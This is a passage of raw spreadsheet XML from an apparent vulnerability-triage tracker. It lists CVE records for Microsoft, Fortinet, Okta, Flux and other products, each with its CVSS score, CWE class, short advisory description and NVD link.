      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83501</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83991</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K462"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62" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86673</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69402</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69417</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69690</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84385</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.6, FortiSOAR PaaS 7.5.0 through 7.5.3, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.6, FortiSOAR on-premise 7.5.0 through 7.5.3, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to escalation of privilege via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47680</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K46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69" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78631</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Agent writes the decoded SAML bearer assertion to a local application log file at the default log level on every successful MFA completion. This insertion of sensitive information into the log file makes a live authentication credential readable by any local user with access to the log file.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84386</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78635</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>The Okta Privileged Access client URL handler does not insert an option terminator before appending the target value to the command-line arguments. When a scaleft:// protocol handler link contains a value beginning with a hyphen, the underlying CLI framework interprets it as a command-line flag, causing unintended modification of the SSH client's behavior.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22575</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68785</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K474" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78624</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69615</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K476" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L476" s="5" t="inlineStr"/>
